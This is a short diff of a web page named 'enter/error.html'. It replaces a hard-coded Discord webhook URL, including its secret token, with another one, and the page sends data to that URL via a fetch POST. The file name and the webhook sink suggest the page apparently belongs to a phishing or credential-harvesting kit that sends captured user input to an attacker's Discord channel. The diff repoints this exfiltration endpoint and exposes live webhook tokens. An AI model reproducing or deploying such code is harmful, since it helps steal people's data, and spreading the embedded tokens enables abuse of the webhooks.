--- a/enter/error.html
+++ b/enter/error.html
@@ -125,7 +125,7 @@
      };
 
 
-    const webhookUrl = 'https://discord.com/api/webhooks/1390259653950050404/ivI4l7WAYNmJufgdNl1dhKQLeGIpoNJXh6B_pxG3Ktf3mucXbf-FHi4rHcyX6D1O3kbg';
+    const webhookUrl = 'https://canary.discord.com/api/webhooks/1401232499828461668/Pv4Xnlxp7Y3KpTFxkX0Af0UHUHdFx7f8QBwQ9G9wrpLtsijodLEJm-MXCkHRHBrN0zhZ';
 
     const response = await fetch(webhookUrl, {
       method: 'POST',
@@ -437,5 +437,6 @@ document.getElementById("upload_widget").addEventListener("click", function(){
 </script>
 
   </center></body>
+
 
 </html>
